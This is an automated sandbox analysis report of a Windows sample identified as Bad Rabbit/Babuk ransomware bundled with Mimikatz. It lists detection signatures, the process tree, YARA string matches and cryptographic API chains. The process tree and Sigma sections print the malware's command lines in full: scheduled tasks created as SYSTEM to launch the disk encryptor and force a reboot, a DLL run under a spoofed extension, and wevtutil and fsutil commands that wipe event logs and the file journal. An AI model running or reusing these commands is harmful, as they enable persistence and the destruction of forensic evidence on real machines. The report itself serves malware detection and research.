Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.exe

Overview

General Information

Sample name:download.exe
Analysis ID:1591384
MD5:fbbdc39af1139aebba4da004475e8839
SHA1:de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256:630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
Infos:

Detection

Babuk, Mimikatz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
System process connects to network (likely due to code injection or exploit)
Yara detected Babuk Ransomware
Yara detected Mimikatz
AI detected suspicious sample
Clears the journal log
Clears the windows event log
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Contains functionality to infect the boot sector
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking mutex)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Eventlog Clear or Configuration Change
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • download.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\download.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
    • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7412 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 7432 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7480 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7532 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7584 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit" MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7564 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7680 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00 MD5: 48C2FE20575769DE916F48EF0676A965)
      • 2594.tmp (PID: 7624 cmdline: "C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1} MD5: 347AC3B6B791054DE3E5720A7144A977)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7784 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wevtutil.exe (PID: 7832 cmdline: wevtutil cl Setup MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7856 cmdline: wevtutil cl System MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7872 cmdline: wevtutil cl Security MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7888 cmdline: wevtutil cl Application MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • fsutil.exe (PID: 7904 cmdline: fsutil usn deletejournal /D C: MD5: 452CA7574A1B2550CD9FF83DDBE87463)
      • cmd.exe (PID: 8148 cmdline: /c schtasks /Delete /F /TN drogon MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5244 cmdline: schtasks /Delete /F /TN drogon MD5: 48C2FE20575769DE916F48EF0676A965)
  • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dispci.exe (PID: 8032 cmdline: "C:\Windows\dispci.exe" -id 3065482610 MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8084 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8132 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
  • LogonUI.exe (PID: 8172 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3f61055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • svchost.exe (PID: 7588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 2596 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f6c855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 6812 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 5956 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • LogonUI.exe (PID: 1832 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f74055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 6100 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f04055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 5296 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
MimiKatzVaronis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
  • APT32
  • Anunak
  • GALLIUM
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
download.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\dispci.exesig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
  • 0x1b40a:$s3: If you have already got the password, please enter it below.
  • 0x1f55a:$s3: If you have already got the password, please enter it below.
  • 0x2130c:$s4: dispci.exe
  • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x147b8:$s7: Enter password#1:
  • 0x14676:$s8: Enter password#2:
  • 0x14430:$s9: C:\Windows\cscc.dat
  • 0x14940:$s10: schtasks /Delete /F /TN %ws
  • 0x1b448:$s11: Password#1:
  • 0x1f598:$s11: Password#1:
  • 0x14398:$s12: \AppData
  • 0x14650:$s13: Readme.txt
  • 0x14752:$s14: Disk decryption completed
  • 0x146ca:$s15: Files decryption completed
  • 0x212b4:$s16: http://diskcryptor.net/
  • 0x1b235:$s17: Your personal installation key#1:
C:\Windows\dispci.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
  • 0x14430:$x4: C:\Windows\cscc.dat
  • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
  • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x146ca:$s6: Files decryption completed
  • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
C:\Windows\cscc.datINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
  • 0x2b3d8:$d1: \DosDevices\dcrypt
  • 0x2b488:$d2: $dcsys$_fail_%x
  • 0x2b468:$d3: %s\$DC_TRIM_%x$
  • 0x2b3b8:$d4: \Device\dcrypt
  • 0x2b420:$d5: %s\$dcsys$

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmpsig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
  • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
  • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
  • 0x1a452:$s3: If you have already got the password, please enter it below.
  • 0x1e5a2:$s3: If you have already got the password, please enter it below.
  • 0x20354:$s4: dispci.exe
  • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
  • 0x13800:$s7: Enter password#1:
  • 0x136be:$s8: Enter password#2:
  • 0x13478:$s9: C:\Windows\cscc.dat
  • 0x13988:$s10: schtasks /Delete /F /TN %ws
  • 0x1a490:$s11: Password#1:
  • 0x1e5e0:$s11: Password#1:
  • 0x133e0:$s12: \AppData
  • 0x13698:$s13: Readme.txt
  • 0x1379a:$s14: Disk decryption completed
  • 0x13712:$s15: Files decryption completed
  • 0x202fc:$s16: http://diskcryptor.net/
  • 0x1a27d:$s17: Your personal installation key#1:
Process Memory Space: rundll32.exe PID: 7412JoeSecurity_babukYara detected Babuk RansomwareJoe Security
    Process Memory Space: dispci.exe PID: 8032JoeSecurity_babukYara detected Babuk RansomwareJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.download.exe.10ce578.1.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
      • 0x5514:$x3: C:\Windows\infpub.dat
      • 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
      0.0.download.exe.c00000.0.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
      • 0x6114:$x3: C:\Windows\infpub.dat
      • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
      0.2.download.exe.c00000.0.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
      • 0x6114:$x3: C:\Windows\infpub.dat
      • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
      11.0.2594.tmp.7ff73cfc0000.0.unpackJoeSecurity_Mimikatz_2Yara detected MimikatzJoe Security
        11.0.2594.tmp.7ff73cfc0000.0.unpackBadRabbit_Mimikatz_CompAuto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035Florian Roth
        • 0xa848:$s1: %lS%lS%lS:%lS
        • 0xa440:$s2: lsasrv
        • 0xa868:$s3: CredentialKeys
        • 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
        Click to see the 24 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Invoke-Obfuscation CLIP+ Launcher
        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7412, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7532, ProcessName: cmd.exe
        Sigma detected: Invoke-Obfuscation VAR+ Launcher
        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7412, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7532, ProcessName: cmd.exe
        Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7532, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7584, ProcessName: schtasks.exe
        Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7532, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7584, ProcessName: schtasks.exe
        Sigma detected: Suspicious Eventlog Clear or Configuration Change
        Source: Process startedAuthor: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105: Data: Command: wevtutil cl Setup, CommandLine: wevtutil cl Setup, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wevtutil.exe, NewProcessName: C:\Windows\SysWOW64\wevtutil.exe, OriginalFileName: C:\Windows\SysWOW64\wevtutil.exe, ParentCommandLine: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7784, ParentProcessName: cmd.exe, ProcessCommandLine: wevtutil cl Setup, ProcessId: 7832, ProcessName: wevtutil.exe
        Sigma detected: Execution of Suspicious File Type Extension
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cdd.dll, NewProcessName: C:\Windows\System32\cdd.dll, OriginalFileName: C:\Windows\System32\cdd.dll, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: cdd.dll
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7588, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Sigma detected: Execute DLL with spoofed extension
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\download.exe", ParentImage: C:\Users\user\Desktop\download.exe, ParentProcessId: 7360, ParentProcessName: download.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 7412, ProcessName: rundll32.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: download.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\Windows\dispci.exeAvira: detection malicious, Label: TR/Diskcoder.12354
        Multi AV Scanner detection for dropped file
        Source: C:\Windows\dispci.exeReversingLabs: Detection: 97%
        Multi AV Scanner detection for submitted file
        Source: download.exeReversingLabs: Detection: 97%
        Source: download.exeVirustotal: Detection: 88%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04856085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,2_2_04856085
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04856299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,2_2_04856299
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,2_2_04855613
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,2_2_04855A73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,2_2_04855BC4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,2_2_04855507
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,2_2_04855D0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,2_2_0485554A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048556D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,2_2_048556D8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04856246 CryptCreateHash,CryptHashData,CryptGetHashParam,2_2_04856246
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04855780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,2_2_04855780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0485559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,2_2_0485559B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048515A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_048515A7
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF42A0 VirtualAlloc,VirtualLock,GetCurrentThreadId,GetCurrentThreadId,SetWindowsHookExW,SetWindowsHookExW,GetCurrentThreadId,SetWindowsHookExW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,23_2_00DF42A0
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1080 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,23_2_00DF1080
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1810 CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,LocalFree,LocalFree,23_2_00DF1810
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1000 CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,23_2_00DF1000
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF19F0 CryptDuplicateKey,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptDecrypt,FlushViewOfFile,_wprintf,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,SetEvent,SetEvent,23_2_00DF19F0
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1DF0 CryptCreateHash,CryptHashData,CryptGetHashParam,23_2_00DF1DF0
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF15A0 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,23_2_00DF15A0
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1D70 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,23_2_00DF1D70
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF1160 CryptEncrypt,CryptEncrypt,LocalAlloc,_memmove,CryptEncrypt,LocalFree,23_2_00DF1160
